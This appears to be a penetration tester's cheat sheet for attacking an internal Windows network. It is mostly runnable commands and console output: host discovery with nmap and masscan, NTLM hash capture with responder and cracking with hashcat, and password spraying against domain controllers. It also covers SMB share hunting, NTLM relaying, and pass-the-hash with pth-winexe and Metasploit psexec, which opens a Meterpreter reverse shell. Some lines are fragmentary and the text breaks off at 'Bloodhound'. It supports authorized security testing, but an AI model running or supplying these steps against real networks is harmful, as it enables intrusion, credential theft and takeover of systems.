If not given targets list try Nmap Ping Scan Private Ranges and start responder
sudo responder -I eth0
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
#Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
#netdiscover
netdiscover -i eth0 -P
#NBTScan
nbtscan 192.168.1.0/24
Now cat grep and sort the IP addresses into a file called Targets.txt
If given a range do the following
nmap -sn 192.168.10.0/24 -n | grep report | cut -d ' ' -f 5 | tee -a ipaddresses.txt | tee -a targets.txt
nmap -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5- | tee -a host-ip.txt
mkdir -p networkscan
cd networkscan
target=$(echo $1 | cut -d "/" -f 3)
userlist=~/jdksec/Payloads/top-usernames-shortlist.txt
passlist=~/jdksec/Payloads/darkweb2017-top100.txt
line="\n=====================\n"
mkdir -p $target
cd $target
mkdir nmap-basic
mkdir nmap-udp
echo "#####################################################################" | tee -a report-$target.txt
echo "Scan report for $target" |tee -a report-$target.txt
echo "#####################################################################" | tee -a report-$target.txt
echo "$line Nmap Scan for $target...$line " | tee -a report-$target.txt
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $target | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo "## Open Ports:\n";for i in $(echo $ports | sed 's/,/\n/g'); do echo $target:$i; done | tee -a ports-$target.txt
echo "\n"
nmap -Pn -sC -sV -p $ports $target -oN nmap-basic/$target
cat nmap-basic/* >> report-$target.txt
echo "$line Nmap UDP ...$line " | tee -a report-$target.txt
sudo nmap -sUVC --open $target --top-ports 20 -oN nmap-udp/$target
cat nmap-udp/* >> report-$target.txt
cd nmap-basic/
grep -Hari "/tcp" | grep -v ":|" >> ../services-$target.txt
cd ../
cd nmap-udp/
grep -Hari "/udp" | grep -v filtered >> ../services-$target.txt
cd ../
echo "$line Services ...$line " | tee -a report-$target.txt
cat services-$target.txt | tee -a report-$target.txt
echo "$line Ports ...$line " | tee -a report-$target.txt
cat ports-$target.txt | tee -a report-$target.txt
mv nmap-basic/$target nmap-tcp-$target.txt
mv nmap-udp/$target nmap-udp-$target.txt
/bin/rm -rf nmap-udp
/bin/rm -rf nmap-basic
Gather Webservers
cat networkscan/*/service* | cut -d '/' -f 1 | tee -a ports.txt | ~/go/bin/httprobe| tee -a webservers.txt
Now open in firefox, check default creds etc
for i in $(cat webservers.txt); do firefox $i; sleep 1; done
Scan with nuclei
cat webservers.txt | ~/go/bin/nuclei -nts -nc -silent | tee -a vulnscan.txt
Basic Vuln scan quick wins
msfconsole -qx "color false;use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
msfconsole -qx "color false;use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
Check responder for hashes and crack with hashcat
cat /usr/share/responder/logs/*NTLM* | sort -u >> hashes.txt; cat hashes.txt | sort -u -o hashes.txt
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# Much Slower so use npk if possible or cloud cracker
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule
Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl
Then repeat the cracking process with a better password/rule list.
Domain enumeration
Get DC List
# Windows command
nltest /DCLIST:domain.local
# Linux Commands
cat /etc/resolv.conf
nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done
nslookup
> set type=all
_ldap._tcp.dc._msdcs.DOMAIN
Set a timer for every 30 minutes and rerun this attack.
May be worth checking the password lockout policy with the client if in a sensitive environment.
msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp
run
Find open SMB shares which are available unauthenticated
for i in $(cat targets.txt);do smbmap -H $i; done | tee -a smbmap-output.txt
Find open writable shares and search for authenticated file servers:
for i in $(cat targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
ctrl + f WRITE (Search for writable folders)
[Responder Core]
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On
If you capture a high priv users account it will drop the hashes from the system
Now use psexec within metasploit to login to the target
msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit
Sometimes ntlmrelay fails, to fix, run the following
Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run
python ntlmrelayx.py -tf smbsigningdisabled.txt
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
Server\Administrator
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
meterpreter > exit
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py
Bloodhound
Once on the domain as a windows user run the following: